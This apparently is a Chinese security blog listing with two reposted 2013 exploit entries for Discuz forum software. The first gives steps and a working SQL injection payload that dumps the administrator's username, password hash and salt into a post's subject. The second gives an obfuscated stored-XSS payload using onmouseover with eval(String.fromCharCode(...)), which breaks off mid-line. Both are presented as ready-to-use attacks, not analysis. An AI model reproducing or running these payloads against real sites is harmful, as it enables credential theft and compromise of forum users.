网站安全
关注
分享
扫一扫
Lamando
不停的写代码....
展开
-
Discuz x2 直接爆出管理用户和密码
1.注册个用户,登录 2.随便找个帖子回复! 回复内容 ↓ 注入语句: a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment=' 然后到回复补充那里随便补充一下,注入语句就被执行。 补充的地址转载 2013-10-23 23:19:08 · 1580 阅读 · 0 评论 -
Discuz!所有版本通杀 存储型XSS 0day
发贴时勾选源码, 鸡肋在于,要鼠标触碰才能触发,但是,鼠标触碰还是概率很大很大的把上面的alert(/DZ-XSS-0DAY/)换成 [email][url][img]http://www.i0day.comonmouseover=eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112转载 2013-10-23 23:20:22 · 1987 阅读 · 0 评论